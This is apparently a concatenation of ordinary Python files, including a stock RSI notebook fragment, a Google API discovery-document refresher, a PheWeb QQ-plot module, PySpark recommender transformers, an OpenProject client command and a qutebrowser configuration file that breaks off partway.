# In[77]:
RSI_all_ticker.idxmin()
# In[78]:
'''
We consider a particular stock overbought if its RSI is above 70 and
oversold if it is below 30.
Generally, people take RSI < 40 as a rocket (a strong buy candidate).
'''
RSI_all_ticker.nsmallest(80)
# In[ ]:
# In[ ]:
| python |
#!/usr/bin/python3.7
from aiogoogle import Aiogoogle
import os
import sys
import errno
import json
import asyncio
from aiohttp import ClientSession
from aiogoogle import HTTPError
import pprint
def _check_for_correct_cwd(current_dir):
if current_dir[-9:] != "aiogoogle": # current dir is aiogoogle
print(current_dir)
print("must be in aiogoogle's dir, not test dir")
sys.exit()
def _pop_unstable_apis(all_apis: list):
stable_apis = []
for api in all_apis:
if not len(api[1]) > 3: # No funky versions because they break the tests a lot
stable_apis.append(api)
return stable_apis
async def refresh_disc_docs_json():
file_errors = []
current_dir = os.getcwd()
# Create a new .data/ dir if one doesn't exist
_check_for_correct_cwd(current_dir)
# Refresh all_apis in tests/tests_globals.py
all_apis = []
final_all_apis = []
async with ClientSession() as sess:
apis_pref = await sess.get(
"https://www.googleapis.com/discovery/v1/apis?preferred=true"
)
apis_pref = await apis_pref.json()
for api in apis_pref["items"]:
all_apis.append((api["name"], api["version"]))
all_apis = _pop_unstable_apis(all_apis)
final_all_apis = all_apis
async with Aiogoogle() as google:
tasks = [google.discover(name, version) for (name, version) in all_apis]
print('Requesting all APIs, this might take a while')
all_discovery_documents = await asyncio.gather(*tasks, return_exceptions=True)
# Refresh discovery files in tests/data
for i, google_api in enumerate(all_discovery_documents):
name = all_apis[i][0]
version = all_apis[i][1]
if isinstance(google_api, HTTPError):
e = google_api
if e.res.status_code != 404:
print('Non 404 error')
print('\033[91m\n' + str(e) + '\n\033[0m')
if e.res.status_code == 404:
# only ignore if it's a 404 error. Should raise an error otherwise
final_all_apis = list(filter(lambda api: (api[0] != name), final_all_apis))
file_errors.append({f"{name}-{version}": str(e)})
print(f'\033[91mError: Failed to download {name} {version}\033[0m')
continue
data_dir_name = current_dir + "/tests/data/"
try:
if not os.path.exists(data_dir_name):
os.makedirs(data_dir_name)
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Save discovery document as a .json file to the newly created data dir
file_name = (
current_dir
+ "/tests/data/"
+ name
+ "_"
+ version
+ "_discovery_doc.json"
)
with open(file_name, "w") as discovery_file:
json.dump(google_api.discovery_document, discovery_file)
print(f"saved {name}-{version} to {file_name}")
print("Done")
if file_errors:
print(f"Errors found: {str(file_errors)}")
with open("tests/ALL_APIS.py", "w") as f:
f.write("""### This file is autogenerated ###\n""")
f.write(f"ALL_APIS = {pprint.pformat(final_all_apis)}")
print("SUCCESS!")
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(refresh_disc_docs_json())
| python |
"""
Create json files which can be used to render QQ plots.
Extracted from PheWeb: 2cfaa69
"""
# TODO: make gc_lambda for maf strata, and show them if they're >1.1?
# TODO: copy some changes from <https://github.com/statgen/encore/blob/master/plot-epacts-output/make_qq_json.py>
# Peter has included some original notes on the processing requirements, as follows::
# TODO: reduce QQ memory using Counter(v.qval for v in variants).
# - but we still need to split into 4 strata using MAF. Can that be done efficiently?
# a) we could keep balanced lists for the 4 strata, but we can only be confidently start processing variants
# once we've read 3/4 of all variants
# b) we could assume that, since we're sorted by chr-pos-ref-alt, MAF should be pretty randomly ordered.
# - then we could start processing variants after reading only 10% of all variants
# - if we're wrong, `raise StrataGuessingFailed()` and try again with sorting.
# c) we could run manhattan before this, and make it track Counter(rounded(v.maf,2) for v in variants).
# NOTE: `qval` means `-log10(pvalue)`
import collections
import logging
import math
import typing as ty
import boltons.iterutils
import boltons.mathutils
import scipy.stats
from zorp.parsers import BasicVariant
NUM_BINS = 400
NUM_MAF_RANGES = 4
MAF_SIGFIGS = 2
logger = logging.getLogger(__name__)
Variant = collections.namedtuple('Variant', ['qval', 'maf'])
def augment_variants(variants: ty.Iterator[BasicVariant], num_samples=None):
for var in variants:
if var.pvalue == 0:
# FIXME: Why does QQ plot require this stub value?
qval = 1000 # TODO(pjvh): make an option "convert_pval0_to = [num|None]"
else:
qval = var.neg_log_pvalue
af = var.maf
if af is not None:
af = round(af, MAF_SIGFIGS)
yield Variant(qval=qval, maf=af)
def round_sig(x, digits):
if x == 0:
return 0
elif abs(x) == math.inf or math.isnan(x):
raise ValueError("Cannot round infinity or NaN")
else:
log = math.log10(abs(x))
digits_above_zero = int(math.floor(log))
return round(x, digits - 1 - digits_above_zero)
# TODO: Move these to unit tests
assert round_sig(0.00123, 2) == 0.0012
assert round_sig(1.59e-10, 2) == 1.6e-10
def approx_equal(a, b, tolerance=1e-4):
return abs(a - b) <= max(abs(a), abs(b)) * tolerance
# TODO: Move these to unit tests
assert approx_equal(42, 42.0000001)
assert not approx_equal(42, 42.01)
def make_qq_stratified(variants):
# Some variants may be missing MAF. Sort those at the end of the list (eg, lump with the common variants)
variants = sorted(variants, key=lambda v: (v.maf is None, v.maf))
def make_strata(idx):
# Note: slice_indices[1] is the same as slice_indices[0] of the next slice.
# But that's not a problem, because range() ignores the last index.
slice_indices = (len(variants) * idx // NUM_MAF_RANGES,
len(variants) * (idx + 1) // NUM_MAF_RANGES)
qvals = sorted((variants[i].qval for i in range(*slice_indices)), reverse=True)
return {
'maf_range': (variants[slice_indices[0]].maf,
variants[slice_indices[1] - 1].maf),
'count': len(qvals),
'qq': compute_qq(qvals),
}
return [make_strata(i) for i in range(NUM_MAF_RANGES)]
def make_qq_unstratified(variants, include_qq):
qvals = sorted((v.qval for v in variants), reverse=True)
rv = {}
if include_qq:
rv['qq'] = compute_qq(qvals)
rv['count'] = len(qvals)
rv['gc_lambda'] = {}
for perc in ['0.5', '0.1', '0.01', '0.001']:
gc = gc_value_from_list(qvals, float(perc))
if math.isnan(gc) or abs(gc) == math.inf:
logger.warning('WARNING: got gc_value {!r}'.format(gc))
else:
rv['gc_lambda'][perc] = round_sig(gc, 5)
return rv
def compute_qq(qvals):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
if len(qvals) == 0:
return []
if qvals[0] == 0:
logger.warning('WARNING: All pvalues are 1! How is that supposed to make a QQ plot?')
return []
max_exp_qval = -math.log10(0.5 / len(qvals))
# Our QQ plot will only show `obs_qval` up to `ceil(2*max_exp_pval)`.
# So we can drop any obs_qval above that, to save space and make sure the visible range gets all the NUM_BINS.
# this calculation must avoid dropping points that would be shown by the calculation done in javascript.
# `max_obs_qval` means the largest observed -log10(pvalue) that will be shown in the plot. It's usually NOT the
# largest in the data.
max_obs_qval = boltons.mathutils.clamp(qvals[0],
lower=max_exp_qval,
upper=math.ceil(2 * max_exp_qval))
if qvals[0] > max_obs_qval:
for qval in qvals:
if qval <= max_obs_qval:
max_obs_qval = qval
break
occupied_bins = set()
for i, obs_qval in enumerate(qvals):
if obs_qval > max_obs_qval:
continue
exp_qval = -math.log10((i + 0.5) / len(qvals))
exp_bin = int(exp_qval / max_exp_qval * NUM_BINS)
# TODO(pjvh): it'd be great if the `obs_bin`s started right at the lowest qval in that `exp_bin`.
# that way we could have fewer bins but still get a nice straight diagonal line without that
# stair-stepping appearance.
obs_bin = int(obs_qval / max_obs_qval * NUM_BINS)
occupied_bins.add((exp_bin, obs_bin))
bins = []
for exp_bin, obs_bin in occupied_bins:
assert 0 <= exp_bin <= NUM_BINS, exp_bin
assert 0 <= obs_bin <= NUM_BINS, obs_bin
bins.append((
exp_bin / NUM_BINS * max_exp_qval,
obs_bin / NUM_BINS * max_obs_qval
))
return {
'bins': sorted(bins),
'max_exp_qval': max_exp_qval,
}
def gc_value_from_list(qvals, quantile=0.5):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
qval = qvals[int(len(qvals) * quantile)]
pval = 10 ** -qval
return gc_value(pval, quantile)
def gc_value(pval, quantile=0.5):
# This should be equivalent to R: `qchisq(median_pval, df=1, lower.tail=F) / qchisq(quantile, df=1, lower.tail=F)`
return scipy.stats.chi2.ppf(1 - pval, 1) / scipy.stats.chi2.ppf(1 - quantile, 1)
# TODO: These should be moved to unit tests
assert approx_equal(gc_value(0.49), 1.047457) # computed using R code.
assert approx_equal(gc_value(0.5), 1)
assert approx_equal(gc_value(0.50001), 0.9999533)
assert approx_equal(gc_value(0.6123), 0.5645607)
def get_confidence_intervals(num_variants, confidence=0.95):
one_sided_doubt = (1 - confidence) / 2
# `variant_counts` are the numbers of variants at which we'll calculate the confidence intervals
# any `1 <= variant_count <= num_variants-1` could be used, but scale in powers of 2 to make the CI visually smooth
variant_counts = []
for x in range(0, int(math.ceil(math.log2(num_variants)))):
variant_counts.append(2 ** x)
variant_counts.append(num_variants - 1)
variant_counts.reverse()
for variant_count in variant_counts:
rv = scipy.stats.beta(variant_count, num_variants - variant_count)
yield {
'x': round(-math.log10((variant_count - 0.5) / num_variants), 2),
'y_min': round(-math.log10(rv.ppf(1 - one_sided_doubt)), 2),
'y_max': round(-math.log10(rv.ppf(one_sided_doubt)), 2),
}
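# Illustrative usage sketch: building the QQ JSON pieces from an iterable of
# zorp BasicVariant records (`basic_variants` is assumed to exist).
#
#   variants = list(augment_variants(basic_variants))
#   unstratified = make_qq_unstratified(variants, include_qq=True)
#   stratified = make_qq_stratified(variants)
#   ci = list(get_confidence_intervals(len(variants)))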
| python |
# coding: utf-8
from pyspark import keyword_only
from pyspark.ml import Transformer
from pyspark.ml.param.shared import Param
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
spark = SparkSession.builder.getOrCreate()
class RatingBuilder(Transformer):
def _transform(self, raw_df):
rating_df = raw_df \
.selectExpr('from_user_id AS user', 'repo_id AS item', '1 AS rating', 'starred_at') \
.orderBy('user', F.col('starred_at').desc())
return rating_df
# TODO: no longer compatible with the new database schema; needs to be handled
class DataCleaner(Transformer):
@keyword_only
def __init__(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
super(DataCleaner, self).__init__()
self.min_item_stargazers_count = Param(self, 'min_item_stargazers_count', 'remove items whose stargazer count is below this number')
self.max_item_stargazers_count = Param(self, 'max_item_stargazers_count', 'remove items whose stargazer count exceeds this number')
self.min_user_starred_count = Param(self, 'min_user_starred_count', 'remove users whose starred repo count is below this number')
self.max_user_starred_count = Param(self, 'max_user_starred_count', 'remove users whose starred repo count exceeds this number')
self._setDefault(min_item_stargazers_count=1, max_item_stargazers_count=50000, min_user_starred_count=1, max_user_starred_count=50000)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def set_min_item_stargazers_count(self, value):
self._paramMap[self.min_item_stargazers_count] = value
return self
def get_min_item_stargazers_count(self):
return self.getOrDefault(self.min_item_stargazers_count)
def set_max_item_stargazers_count(self, value):
self._paramMap[self.max_item_stargazers_count] = value
return self
def get_max_item_stargazers_count(self):
return self.getOrDefault(self.max_item_stargazers_count)
def set_min_user_starred_count(self, value):
self._paramMap[self.min_user_starred_count] = value
return self
def get_min_user_starred_count(self):
return self.getOrDefault(self.min_user_starred_count)
def set_max_user_starred_count(self, value):
self._paramMap[self.max_user_starred_count] = value
return self
def get_max_user_starred_count(self):
return self.getOrDefault(self.max_user_starred_count)
def _transform(self, rating_df):
min_item_stargazers_count = self.get_min_item_stargazers_count()
max_item_stargazers_count = self.get_max_item_stargazers_count()
min_user_starred_count = self.get_min_user_starred_count()
max_user_starred_count = self.get_max_user_starred_count()
to_keep_items_df = rating_df \
.groupBy('item') \
.agg(F.count('user').alias('stargazers_count')) \
.where('stargazers_count >= {0} AND stargazers_count <= {1}'.format(min_item_stargazers_count, max_item_stargazers_count)) \
.orderBy('stargazers_count', ascending=False) \
.select('item', 'stargazers_count')
temp1_df = rating_df.join(to_keep_items_df, 'item', 'inner')
to_keep_users_df = temp1_df \
.groupBy('user') \
.agg(F.count('item').alias('starred_count')) \
.where('starred_count >= {0} AND starred_count <= {1}'.format(min_user_starred_count, max_user_starred_count)) \
.orderBy('starred_count', ascending=False) \
.select('user', 'starred_count')
temp2_df = temp1_df.join(to_keep_users_df, 'user', 'inner')
clean_df = temp2_df.select('user', 'item', 'rating', 'starred_at')
return clean_df
class PredictionProcessor(Transformer):
def _transform(self, predicted_df):
non_null_df = predicted_df.dropna(subset=['prediction', ])
prediction_df = non_null_df.withColumn('prediction', non_null_df['prediction'].cast('double'))
return prediction_df
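# Illustrative usage sketch (the source table is hypothetical; it is assumed to
# have the from_user_id, repo_id and starred_at columns that RatingBuilder expects):
#
#   raw_df = spark.table("starred_events")
#   rating_df = RatingBuilder().transform(raw_df)
#   clean_df = DataCleaner(min_item_stargazers_count=2, max_item_stargazers_count=10000,
#                          min_user_starred_count=2, max_user_starred_count=10000).transform(rating_df)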
| python |
import json
from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.post_request import PostRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.work_package.work_package_command import WorkPackageCommand
from pyopenproject.model.form import Form
class CreateRelationForm(WorkPackageCommand):
def __init__(self, connection, work_package, relation):
super().__init__(connection)
self.work_package = work_package
self.relation = relation
def execute(self):
try:
json_obj = PostRequest(connection=self.connection,
context=f"{self.CONTEXT}/{self.work_package.id}/form",
json=json.dumps(self.relation.__dict__)).execute()
return Form(json_obj)
except RequestError as re:
raise BusinessError(f"Error creating relation for work package {self.work_package.id}") from re
| python |
# qutebrowser config.py
#
# NOTE: config.py is intended for advanced users who are comfortable
# with manually migrating the config file on qutebrowser upgrades. If
# you prefer, you can also configure qutebrowser using the
# :set/:bind/:config-* commands without having to write a config.py
# file.
#
# Documentation:
# qute://help/configuring.html
# qute://help/settings.html
# Uncomment this to still load settings configured via autoconfig.yml
# config.load_autoconfig()
# Aliases for commands. The keys of the given dictionary are the
# aliases, while the values are the commands they map to.
# Type: Dict
c.aliases = {
'wq' : 'quit --save',
'w' : 'session-save',
'q' : 'quit',
'pe' : 'set content.proxy http://localhost:8080',
'pd' : 'set content.proxy system',
'mpv' : 'spawn --userscript mpv'
}
# Require a confirmation before quitting the application.
# Type: ConfirmQuit
# Valid values:
# - always: Always show a confirmation.
# - multiple-tabs: Show a confirmation if multiple tabs are opened.
# - downloads: Show a confirmation if downloads are running
# - never: Never show a confirmation.
c.confirm_quit = ['never']
# Maximum time (in minutes) between two history items for them to be
# considered being from the same browsing session. Items with less time
# between them are grouped when being displayed in `:history`. Use -1 to
# disable separation.
# Type: Int
c.history_gap_interval = 30
# When to find text on a page case-insensitively.
# Type: IgnoreCase
# Valid values:
# - always: Search case-insensitively.
# - never: Search case-sensitively.
# - smart: Search case-sensitively if there are capital characters.
c.search.ignore_case = 'smart'
# Find text on a page incrementally, renewing the search for each typed
# character.
# Type: Bool
c.search.incremental = True
# How to open links in an existing instance if a new one is launched.
# This happens when e.g. opening a link from a terminal. See
# `new_instance_open_target_window` to customize in which window the
# link is opened in.
# Type: String
# Valid values:
# - tab: Open a new tab in the existing window and activate the window.
# - tab-bg: Open a new background tab in the existing window and activate the window.
# - tab-silent: Open a new tab in the existing window without activating the window.
# - tab-bg-silent: Open a new background tab in the existing window without activating the window.
# - window: Open in a new window.
c.new_instance_open_target = 'tab'
# Which window to choose when opening links as new tabs. When
# `new_instance_open_target` is set to `window`, this is ignored.
# Type: String
# Valid values:
# - first-opened: Open new tabs in the first (oldest) opened window.
# - last-opened: Open new tabs in the last (newest) opened window.
# - last-focused: Open new tabs in the most recently focused window.
# - last-visible: Open new tabs in the most recently visible window.
c.new_instance_open_target_window = 'last-focused'
# Name of the session to save by default. If this is set to null, the
# session which was last loaded is saved.
# Type: SessionName
c.session.default_name = None
# Load a restored tab as soon as it takes focus.
# Type: Bool
c.session.lazy_restore = False
# Backend to use to display websites. qutebrowser supports two different
# web rendering engines / backends, QtWebKit and QtWebEngine. QtWebKit
# was discontinued by the Qt project with Qt 5.6, but picked up as a
# well maintained fork: https://github.com/annulen/webkit/wiki -
# qutebrowser only supports the fork. QtWebEngine is Qt's official
# successor to QtWebKit. It's slightly more resource hungry than
# QtWebKit and has a couple of missing features in qutebrowser, but is
# generally the preferred choice.
# Type: String
# Valid values:
# - webengine: Use QtWebEngine (based on Chromium).
# - webkit: Use QtWebKit (based on WebKit, similar to Safari).
c.backend = 'webengine'
# Time interval (in milliseconds) between auto-saves of
# config/cookies/etc.
# Type: Int
c.auto_save.interval = 15000
# Always restore open sites when qutebrowser is reopened.
# Type: Bool
c.auto_save.session = False
# Automatically start playing `<video>` elements. Note: On Qt < 5.11,
# this option needs a restart and does not support URL patterns.
# Type: Bool
c.content.autoplay = True
# Size (in bytes) of the HTTP network cache. Null to use the default
# value. With QtWebEngine, the maximum supported value is 2147483647 (~2
# GB).
# Type: Int
c.content.cache.size = None
# Allow websites to read canvas elements. Note this is needed for some
# websites to work properly.
# Type: Bool
c.content.canvas_reading = True
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'chrome-devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
c.content.cookies.accept = 'no-3rdparty'
# Store cookies. Note this option needs a restart with QtWebEngine on Qt
# < 5.9.
# Type: Bool
c.content.cookies.store = True
# Default encoding to use for websites. The encoding must be a string
# describing an encoding such as _utf-8_, _iso-8859-1_, etc.
# Type: String
c.content.default_encoding = 'utf-8'
# Limit fullscreen to the browser window (does not expand to fill the
# screen).
# Type: Bool
c.content.fullscreen.window = False
# Allow websites to share screen content. On Qt < 5.10, a dialog box is
# always displayed, even if this is set to "true".
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.desktop_capture = 'ask'
# Try to pre-fetch DNS entries to speed up browsing.
# Type: Bool
c.content.dns_prefetch = True
# Allow websites to request geolocations.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.geolocation = 'ask'
# Value to send in the `Accept-Language` header. Note that the value
# read from JavaScript is always the global value.
# Type: String
c.content.headers.accept_language = 'en-US,en'
# Custom headers for qutebrowser HTTP requests.
# Type: Dict
c.content.headers.custom = {}
# Value to send in the `DNT` header. When this is set to true,
# qutebrowser asks websites to not track your identity. If set to null,
# the DNT header is not sent at all.
# Type: Bool
c.content.headers.do_not_track = True
# When to send the Referer header. The Referer header tells websites
# from which website you were coming from when visiting them. No restart
# is needed with QtWebKit.
# Type: String
# Valid values:
# - always: Always send the Referer.
# - never: Never send the Referer. This is not recommended, as some sites may break.
# - same-domain: Only send the Referer for the same domain. This will still protect your privacy, but shouldn't break any sites. With QtWebEngine, the referer will still be sent for other domains, but with stripped path information.
c.content.headers.referer = 'same-domain'
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version}', 'https://web.whatsapp.com/')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://accounts.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99 Safari/537.36', 'https://*.slack.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://docs.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://drive.google.com/*')
# Enable host blocking.
# Type: Bool
c.content.host_blocking.enabled = True
# List of URLs of lists which contain hosts to block. The file can be
# in one of the following formats: - An `/etc/hosts`-like file - One
# host per line - A zip-file of any of the above, with either only one
# file, or a file named `hosts` (with any extension). It's also
# possible to add a local file or directory via a `file://` URL. In case
# of a directory, all files in the directory are read as adblock lists.
# The file `~/.config/qutebrowser/blocked-hosts` is always read if it
# exists.
# Type: List of Url
c.content.host_blocking.lists = ['https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts']
# A list of patterns that should always be loaded, despite being ad-
# blocked. Note this whitelists blocked hosts, not first-party URLs. As
# an example, if `example.org` loads an ad from `ads.example.org`, the
# whitelisted host should be `ads.example.org`. If you want to disable
# the adblocker on a given page, use the `content.host_blocking.enabled`
# setting with a URL pattern instead. Local domains are always exempt
# from hostblocking.
# Type: List of UrlPattern
c.content.host_blocking.whitelist = ['piwik.org']
# Enable hyperlink auditing (`<a ping>`).
# Type: Bool
c.content.hyperlink_auditing = False
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'chrome-devtools://*')
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'devtools://*')
# Load images automatically in web pages.
# Type: Bool
c.content.images = True
# Show javascript alerts.
# Type: Bool
c.content.javascript.alert = True
# Allow JavaScript to read from or write to the clipboard. With
# QtWebEngine, writing the clipboard as response to a user interaction
# is always allowed.
# Type: Bool
c.content.javascript.can_access_clipboard = False
# Allow JavaScript to open new tabs without user interaction.
# Type: Bool
c.content.javascript.can_open_tabs_automatically = False
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'chrome-devtools://*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'devtools://*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'chrome://*/*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'qute://*/*')
# Enable JavaScript.
# Type: Bool
c.content.javascript.enabled = True
# Log levels to use for JavaScript console logging messages. When a
# JavaScript message with the level given in the dictionary key is
# logged, the corresponding dictionary value selects the qutebrowser
# logger to use. On QtWebKit, the "unknown" setting is always used. The
# following levels are valid: `none`, `debug`, `info`, `warning`,
# `error`.
# Type: Dict
c.content.javascript.log = {'error': 'debug', 'warning': 'debug', 'unknown': 'debug', 'info': 'debug'}
# Use the standard JavaScript modal dialog for `alert()` and
# `confirm()`.
# Type: Bool
c.content.javascript.modal_dialog = False
# Show javascript prompts.
# Type: Bool
c.content.javascript.prompt = True
# Allow locally loaded documents to access remote URLs.
# Type: Bool
c.content.local_content_can_access_remote_urls = False
# Allow locally loaded documents to access other local URLs.
# Type: Bool
c.content.local_content_can_access_file_urls = True
# Enable support for HTML 5 local storage and Web SQL.
# Type: Bool
c.content.local_storage = True
# Netrc-file for HTTP authentication. If unset, `~/.netrc` is used.
# Type: File
c.content.netrc_file = None
# Allow pdf.js to view PDF files in the browser. Note that the files can
# still be downloaded by clicking the download button in the pdf.js
# viewer.
# Type: Bool
c.content.pdfjs = True
# Allow websites to request persistent storage quota via
# `navigator.webkitPersistentStorage.requestQuota`.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.persistent_storage = 'ask'
# Enable plugins in Web pages.
# Type: Bool
c.content.plugins = True
# Draw the background color and images also when the page is printed.
# Type: Bool
c.content.print_element_backgrounds = True
# Open new windows in private browsing mode which does not record
# visited pages.
# Type: Bool
c.content.private_browsing = False
# Proxy to use. In addition to the listed values, you can use a
# `socks://...` or `http://...` URL. Note that with QtWebEngine, it will
# take a couple of seconds until the change is applied, if this value is
# changed at runtime.
# Type: Proxy
# Valid values:
# - system: Use the system wide proxy.
# - none: Don't use any proxy
c.content.proxy = 'system'
# Validate SSL handshakes.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.ssl_strict = 'ask'
# List of user stylesheet filenames to use.
# Type: List of File, or File
c.content.user_stylesheets = []
# Enable WebGL.
# Type: Bool
c.content.webgl = True
# Monitor load requests for cross-site scripting attempts. Suspicious
# scripts will be blocked and reported in the devtools JavaScript
# console. Note that bypasses for the XSS auditor are widely known and
# it can be abused for cross-site info leaks in some scenarios, see:
# https://www.chromium.org/developers/design-documents/xss-auditor
# Type: Bool
c.content.xss_auditing = True
# Height (in pixels or as percentage of the window) of the completion.
# Type: PercOrInt
c.completion.height = '25%'
# Move on to the next part when there's only one possible completion
# left.
# Type: Bool
c.completion.quick = True
# When to show the autocompletion window.
# Type: String
# Valid values:
# - always: Whenever a completion is available.
